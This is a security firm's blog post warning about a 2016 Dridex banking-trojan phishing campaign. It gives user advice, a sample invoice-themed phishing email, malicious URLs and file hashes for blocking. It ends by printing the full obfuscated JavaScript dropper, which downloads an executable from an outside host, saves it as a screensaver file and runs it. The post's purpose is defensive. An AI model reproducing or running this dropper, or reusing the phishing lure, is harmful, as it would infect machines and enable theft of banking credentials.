020 3151 6000

Is a huge Global Malware attack pending?

Posted by
twitterlinkedinmail

Over the past week we have seen a massive increase in attempted malware attacks via email.  Is this linked to the huge increase in malware which Symantec have seen throughout January 2016?  If the malware is successful in infecting your machine it starts attempting to steal banking and other personal information.

What do you need to do to prevent it?

  1. Only open attachment you are expecting to receive, be especially wary of .js and .scr
  2. Look out for emails with the Subject Line: Quick Question
  3. Keep AV up to date
  4. Keep Windows Updates up to date
  5. Immediately delete suspect emails

For the Technical Minded:

We have researched this infection and it appears emails under most circumstances look like they are from legitimate sources and attempt to get you to download a JavaScript (.js) file attachment.

Example of the email being received:

——————————————————————————————————————————-

Date: Thu, 04 Feb 2016 10:52:21 +0300
Subject: “January balance £785”
Attachment: IN161561-201601.js

Hi,

Thank you for your recent payment of £672.

It appears the attached January invoice has been missed off of your payment. Could
you please advise when this will be paid or if there is a query with the invoice?

Regards

Sarah Smith
Assistant Accountant

——————————————————————————————————————————-

The file attachments are in formats such as:

IN161561-201601.js
DOC201114-201114-001.js

The JavaScript code inside these files is heavily obfuscated with the aim of hiding what it is attempting to do.

We have deciphered the code and can see that is it attempting to exploit a previously downloaded .scr (Screensaver) file which in turn attempts to download and run an executable (.exe) file called 843tf.exe. Bizarrely when the executable runs the process is tagged with the description “Life predecessors calculators been”no idea what this means, any ideas?

Regardless, the executable is downloaded from one of the following URLS:

ejanla.co/43543r34r/
cafecl.1pworks.com/43543r34r/

At the time of writing, this executable has been confirmed as the Dridex Banking Trojan. Dridex is a strain of banking malware that leverages macros in Microsoft Office to infect systems. Once a computer has been infected, Dridex attackers can steal banking credentials and other personal information on the system to gain access to the financial records of a user.

Block the infected files to protect your systems!

If you are in charge of any IT systems we strongly recommend you block the scripts and exe’s which are part of this malware.  If you are using Webroot you can create a Global Blacklist and block the following MD5 file hashes:

  • BBA6C087E28273F2F951448B4B3387DA   (843tf.exe)
  • 07F2D7759EFFBA3862ED7C05B307D7C0  (.js script)

If you need assistance in doing this please do get in touch [email protected] and I am sure we can help.

Can you solve this puzzle?

The malware code is below. Whilst we have decoded the code, we’d be interested to hear from anyone else who can and is interested in a new career opportunity.

aDhwsLnov= this['Ac' + ('9YVPNo', 'SLUpny', 'p9GCkM', 't') + 'iv' + ('Xc91F', 'pGvzE', 'psPf', 'e') + 'X' + ('aKZIB', 'Sh0', '4wV', 'O') + 'b' + ('52oIs', 'e1', 'GqcwG', 'j') + 'ec' + ('Qi6', 'Uurc', 'Eg1z', 't') + ''];var aEWRpjfU4 = new aDhwsLnov('WSc' + ('k9nMe', 'OYieb', 'VJWL23', 'r') + 'i' + ('xL93pp', 'ZH', 'E1Z2Oe', 'p') + 't.' + ('dXRoM', '8IybL', '8jEhm4', 'S') + 'he' + ('3phH', 'hKfv', 'SImK', 'l') + 'l');var aMCQvDP5Q = aEWRpjfU4['Ex' + ('gR5rC', 'zWCRjG', 'LKY3', 'p') + 'a' + ('kcGQ', 'yyXjG', 'QW', 'n') + 'dE' + ('oAUYxw', 'QdpCXo', 'pO0Bu', 'n') + 'vi' + ('3pa', '5hd', 'e9', 'r') + 'o' + ('3pmAed', 'DPL1ua', 'uMklZo', 'n') + 'me' + ('LQr', 'SG7jvb', 'SMX5A', 'n') + 'tS' + ('lDqwtU', 'Ofj', '0tX', 't') + 'ri' + ('WJB427', 'LZ2', '5Ck1Y', 'n') + 'gs']('%T' + ('rmOg', '7tCAq', 'vnc7', 'E') + 'M' + ('eH0', 'JJk', '4lk', 'P') + '%' + ('Pu8DLL', 'enlFQ', '22Xthc', '/') + '') + "CDq1BPca"+'.s' + ('U1Lg', '6A', 'Tq', 'c') + 'r';
var asezTpXpb = new aDhwsLnov('MS' + ('oNN', 'b8h1Z', '3XN', 'X') + 'M' + ('YCA', 'EmaKsL', 'mbwpeU', 'L') + '2' + ('woa', 'p98t7W', 'hVqRO4', '.') + 'X' + ('OGJH3V', 's97', 'bE3lt', 'M') + 'L' + ('BWDyK', 'taMifZ', '4G0', 'H') + 'TT' + ('WZc56', 'gLWCep', 'Qm', 'P') + '');
asezTpXpb['on' + ('FRh', '9wrq', '8rmS', 'r') + 'e' + ('4tsX', 'eTmsi', 'jFgH', 'a') + 'dy' + ('z3oJAP', 'bY', 'xQZSV', 's') + 't' + ('SdzL', '245l', 'l3viD', 'a') + 'te' + ('m9wwk', '8Rk8', 'fB58P', 'c') + 'ha' + ('pHZu3J', '6f8JOO', 'Xk', 'n') + 'ge'] = function() {
if (asezTpXpb['re' + ('L99UUp', '0xlF', 'Lmsf', 'a') + 'd' + ('5wr', 'gf2', 'dnZ', 'y') + 'st' + ('LEl', 'zKczi', 'eLjB', 'a') + 't' + ('1pFyQ', 'O5Vbjj', 'Ov', 'e') + ''] === 4) {
var azgGc5M3S = new aDhwsLnov('AD' + ('C2BPBU', 'QFH', 'Shti', 'O') + 'DB' + ('8PP', 'L0w', 'bl', '.') + 'St' + ('OqK', '1zsWXi', 'FKuWd', 'r') + 'ea' + ('eUI48u', 'Fy', '08o', 'm') + '');
azgGc5M3S['ope' + ('GBJ', 'xG', '9mcD', 'n') + '']();
azgGc5M3S['ty' + ('cFlU', 'uoPaX', 'b6', 'p') + 'e'] = 1;
azgGc5M3S['wr' + ('EHgnQ', '4iXquB', 'V1VAn', 'i') + 'te'](asezTpXpb['Re' + ('f92dgd', 'LeZ', 'VgNL', 's') + 'p' + ('31iyC2', 'EX42', 'oU3yXg', 'o') + 'ns' + ('AAp', '0kPO', 'TG', 'e') + 'B' + ('YHy0bd', 'ffMEaQ', '761', 'o') + 'd' + ('BHgC2', 'q8', '6i', 'y') + '']);
azgGc5M3S['po' + ('u6b', '4rYR5', 'Hh', 's') + 'i' + ('jzvUhM', 'jTXs', '3KQ8Kk', 't') + 'i' + ('2jn1as', 'SK', 'H30c', 'o') + 'n'] = 0;
azgGc5M3S['sa' + ('vBTt3N', 'NDFy', 'Uu1eR2', 'v') + 'e' + ('ch4C', '7Cb6Ub', 'v44zR', 'T') + 'oF' + ('uhVs', 'pu', 'hwPB', 'i') + 'le'](aMCQvDP5Q, 2);
azgGc5M3S['cl' + ('k5MXh', 'Stunxz', 'pakUsf', 'o') + 's' + ('FR4Xn', 'y50dq6', 'on', 'e') + '']();
};
};
try {
aM1lypKX3 = 'Ru' + ('oEoXBO', 'VJ', 'b6eQ', 'n') + '';
asezTpXpb['op' + ('lcmrcA', 'jAhGuy', 'ScWQ', 'e') + 'n']('GET' , 'htt' + ('uzUAO', 'y7zUj', 'mwweP7', 'p') + ':/' + ('B44ug', 'k4', 'iOhSJ', '/') + 'ej' + ('vrN5l', '1H', 'yWtFs', 'a') + 'nl' + ('w4KN', '4R', 'nG9gp1', 'a') + '.c' + ('sLZOS0', 'wys0', 'VZu', 'o') + '/' + ('ff9', '71I', 'bYccV', '4') + '3' + ('G6tz7', '6Fs6To', 'oQ', '5') + '4' + ('5jYdl', '0wFdI', 'kniq', '3') + 'r3' + ('xQXdj4', 'Ha', 'xk9D', '4') + 'r/' + ('QYO', 'vt4d4o', 'mPtem', '8') + '4' + ('zDg', 'lqcSL', 'wpt', '3') + 't' + ('heTL', '7PI', 'cxbqU', 'f') + '.e' + ('u9Tbu', 'nn5', 'TvdhT', 'x') + 'e', false);
asezTpXpb['sen' + ('hPT7xC', '5OK', 'knuugF', 'd') + '']();
aEWRpjfU4 [aM1lypKX3](aMCQvDP5Q, 1-1, 1-1);
} catch (aGPs04n4x) {};

Priority One – IT Security Services in London

 

twitterlinkedinmail

Ashley Brown

As one of our senior technicians, Ashley's knowledge of key technologies and products makes him an experienced escalation lead and authority on key areas such as cloud storage.

Leave a Reply

Your email address will not be published.